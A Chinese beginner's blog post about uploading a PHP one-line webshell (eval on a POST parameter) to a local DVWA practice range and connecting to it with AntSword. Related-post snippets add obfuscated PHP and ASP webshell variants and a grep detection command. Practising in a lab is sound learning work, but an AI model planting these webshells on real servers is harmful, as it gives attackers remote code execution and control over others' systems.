一句话木马(绝对入门,实战环境安装+测试)主要是记录我的第一次一句话木马过程,复现40分钟左右。

最新推荐文章于 2024-03-16 18:00:00 发布
最新推荐文章于 2024-03-16 18:00:00 发布
阅读量641 收藏 4
点赞数 1
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ntrybw/article/details/131333430
版权

首先介绍一下,搭建在本地的靶场,可以做渗透和注入的测试,真是好东西。

 安装教程我推荐一篇博客,真的写的很好,我全程坐下来非常流畅非常流畅,csdn少见的高质量博客

 DVWA下载安装_PisaYu的博客-CSDN博客

膜拜大佬,就按照大佬的教程在本地装好一个测试环境

 然后我建议下载中国蚁剑,中国菜刀我也下了,感觉还是蚁剑牛逼一点。

 然后接下来正式开始我的一句话木马:

最典型的php一句话木马:

<?php @eval($_POST['attack']);?>

<?php @eval($_POST['pass']);?>

我的理解:就是字符串通过post语句传入,然后就变成   “echo ‘a';”

变成一个可执行代码,然后就可以传入并且执行,这个代码的作用就是可以让你接触到服务器,然后获得服务器的控制权,就等于完成了渗透操作,卧槽,第一次接触,发现真的好有意思。

写一个最简单的php

 然后我们打开我们的靶场,这里要先调一下等级保护强度,把强度调成low,不然应该是字典有限制,日不进去。low就非常的好日。

 

然后我们进入file uplode 也就是文件上传,将我们写好的一句话木马传上去。

传完之后告诉我success,然后给了一个文件路径,因为这个网站在我本地,所以我可以在本地看一下,就可以在本地这个目录下发现这个文件。

 本地看到文件,实战中等于别人后台服务器看到这个文件,可以算是小后门

 然后我们蚁剑连一下就通了,也就是通过后面连接到服务器

对于这里的access,改成pass都是可以的,应该都是连同,还是很有意思的。

 之后也就等于拿到了这个服务器的权限,不得不说,日站是真有意思,比misc好玩多了,怪不得学渗透可以没日没夜,太有意思了,这只是一个开始,有感而发记录一下

 现实渗透肯定没有那么简单,不过深入,沉淀,网安之路。

modest —YBW
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
一句话木马简单实践
qq_48732306的博客
12-17 1825
最近学习看到了一句话木马这个东西,觉得很有意思,那就来试试吧! 什么是一句话木马: 类似于<?php @eval($_POST['qiuy']);?>,POST里面的就是我们的链接密码。这句话是很明显就是一个PHP一句话木马。eval()这个函数的作用就是把参数当作PHP代码来执行,无论你传入的是啥。比如: eval(echo flag.txt),那么就执行了echo flag.txt这个命令。 类似的还有asp的一句话木马:<%eval request(“qiuy”)%> 如何使用
安全技术系列之Java一句话木马
好记性不如烂笔头
10-14 4312
安全技术系列文章
复现一句话木马
lml_0916的博客
07-23 383
发现了2的值是直接输入的的一些PHP获取文件的函数的字符串,但是assert()函数的参数不可以使用字符串。首先右键添加一个新的数据,将刚刚编写的文件名输入到URL地址中,然后连接密码设置的是2。这样的话同时满足了assert()的参数必须是函数和表达式中的一种,和eval语句中有可以传递的参数,所以连接成功。解决的方式就是修改了一下我的php版本,一开始我用实验的版本是7.3.4的,后面改成了5.3.29的版本扣可以了、但是刚刚直接使用eval进行连接的时候是可以连接的,为什么这样替换就不可以了?....
复现php一句话木马
qq_50646296的博客
07-24 801
phpstudy-pro中,开启apache,MySQL,在WWW目录中创建php文件,在该php文件中进行代码的编写。当显示连接成功时,点击添加,双击添加的那条记录,看见网站内容和目录结构,代表已经和成功了。eval的规则eval是一个语言构造器,他不是一个函数,所以不能被可变函数进行调用。输入测试的本地地址,连接密码输入2,编码格式选择base64,点击测试连接。assert也可以执行任意命令,...
web渗透_一句话木马(webshell)_dvwa环境
摸鱼域的空气。
04-04 8105
厄薇娅·瑞尔说,今天是个好日子。 一、什么是一句话木马 <?php @eval($_POST['a']); ?> 先来一段简单的一句话木马,解析下它的构造: @这个符号的作用是抵制错误提示;eval()函数将接收一个字符串参数,并将这个字符串作为命令语句执行;$_REQUEST['a']从请求参数中得到a这个参数的值,请求参数有两种:GET和POST;a参数名(自定义) 而这段代码的意思就是:用POST方法接收变量a,把变量a里面的字符串当做php代码来执行。 也就是说,你想执行什么代码,.
一句话木马要点和防范注意事项
05-24
"一句话木马",顾名思义,是指利用简短的代码实现的恶意程序,它通常隐藏在网页、脚本或者其他可执行文件中,通过Web服务的漏洞进行植入,以达到远程控制或非法获取服务器权限的目的。这类木马因为其简洁高效的特点...
基于 python 实现的千倍速一句话木马密码爆破工具
最新发布
07-05
一句话木马 【作品名称】:基于 python 实现的千倍速一句话木马密码爆破工具 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目...
一句话 asp木马加密版 彻底突破杀毒软件
01-02
不知道怎样表达清楚。看例子吧: 代码如下:[removed] Execute(HextoStr(“65786563757465287265717565737428636872283335292929”)) Function HextoStr(data) HextoStr=”EXECUTE “”””” C=”&CHR(&H” N...
php一句话cmdshell新型 (非一句话木马)
10-30
PHP 一句话 CMDShell 新型(非一句话木马)】 在 PHP 开发中,存在一种安全漏洞,称为“一句话 CMDShell”,它允许攻击者通过在 PHP 脚本中注入命令来执行系统级别的操作。虽然通常的一句话木马是直接执行 PHP ...
蚁剑的下载与一句话木马
tang3030的博客
09-15 2008
打开宝塔进入admin
渗透干货|史上最全一句话木马
2201_75362610的博客
03-16 2113
/可执行命令一句话密码-7ASPX一句话的 过安全狗效果不怎么样不过我认为能支持aspx 百分之8/90支持asp原来代码是 把标签修改替换下来 为execute request(“cmd”) 这样就避开了符号!表中数据段限制,一句话木马也写不下的情况网络中流传的最小的木马代码是 如过连这也写不下怎么办?
LINUX下的PHP木马查询
maorenqi101的专栏
01-23 697
一句话查找PHP木马: 进入要处理的项目下执行如下命令   # find ./ -name "*.php" |xargs egrep "phpspy|c99sh|milw0rm|eval\(gunerpress|eval\(base64_decoolcode|spider_bc"> /tmp/php.txt   # grep -r --include=*.php '[^a-z]eval(
除了文件上传还有哪些方式可以写一句话木马
qq_51553814的博客
11-29 2300
除了文件上传还有哪些方式可以写一句话木马一句话木马如果上传到服务器的话,有啥危害学过网络安全的人都知道。但是通常网上流传的方式都是通过文件上传来实现木马上传,实在太过老套,这里就教大家几个新的方式来本地生成一句话木马。(这篇笔记知识带大家入个门,想了解的话还得自己查询资料来学习) 这篇笔记也是有很多跳转内容,看不懂可以尝试看看跳转的博客,他们写的一定是比我更好 结合sql注入生成一句话木马 讲这之前得先介绍mysql配置文件中的secure_file_priv选项 secure_file_priv配置
一句话木马
热门推荐
qq_53065516的博客
03-27 2万+
一:一句话木马:标准代码形式:<?php @eval($_POST[‘attack’]) ?> eval()函数表示括号内的语句字符串什么的全都当做代码执行POST[‘attack’]表示从页面中获得attack这个参数值。常见形式:php一句话木马:<?php@eval(_POST[‘attack’]表示从页面中获得attack这个参数值。 常见形式: php一句话木马: <?php @eval(P​OST[‘attack’]表示从页面中获得attack这个参数值。常见形式:p
牛逼的一句话木码
Daoke37的博客
05-10 264
//可执行命令一句话 普通一句话 <?php eval($_POST[cc123]) ?> <?php @eval($_POST['cc123']);?> PHP系列 <?php $a = str_replace(x,"","axsxxsxexrxxt");$a($_POST["xindong"]); ?> <?php $lang = (string)key($_POST);$lang($_POST['xindong']);?> <?php $k="as
一句话木马该怎么实现?现在就带你了解
kali_Ma的博客
07-30 5484
前言 一直以来,Java一句话木马都是采用打入字节码defineClass实现的。这种方法的优势是可以完整的打进去一个类,可以几乎实现Java上的所有功能。不足之处就是Payload过于巨大,并且不像脚本语言一样方便修改。并且还存在很多特征,例如继承ClassLoader,反射调用defineClass等。本在这里提出一种Java一句话木马:利用Java中JS引擎实现的一句话木马。 基本原理 Java没有eval函数,Js有eval函数,可以把字符串当代码解析。 Java从1.6开始自带ScriptEng
30分钟学会编写一句话木马,并连接菜刀渗透网站
qq_41674664的博客
04-17 6340
木马代码 小马: 一句话木马也称为小马,即整个shell代码量只有一行, -一般是系统执行函数 大马:代码量和功能比小马多,一般会进行二次编码加密,防止被安全防火墙/入侵系统检测到 #### 中国菜刀 shell3.php <?php @eval($_POST[chopper]);?> 或<?php eval($_POST[gmd]);?> 说明: REQUES...
怎样修复DVWA一句话木马
06-27
DVWA(Damn Vulnerable Web Application)是一个非常流行的开源Web应用程序,用于教学和测试安全防御措施。如果遇到DVWA中的“一句话木马”漏洞,通常需要采取以下步骤来修复: 1. **确认漏洞位置**:首先确定是哪个文件或代码行存在木马,DVWA中的漏洞可能存在于SQL查询、文件包含或用户输入处理部分。 2. **修改源代码**:定位到有问题的代码,检查是否有不当的字符串拼接、未过滤的用户输入。修复方法可能包括使用参数化查询替换SQL语句,使用`escapeshellcmd()`或类似函数转义用户输入,防止文件路径遍历等。 3. **验证修复**:在修复后,重新运行安全扫描工具验证漏洞是否已被消除。可以在本地环境或线上环境复现漏洞测试过程。 4. **更新和安全配置**:确保应用的其他部分(如服务器配置、防火墙规则等)也有足够的安全措施,防止绕过修复的漏洞。 5. **提交更新**:如果DVWA有开源社区支持,将修复后的代码提交到官方仓库,让更多人受益。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

modest —YBW

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值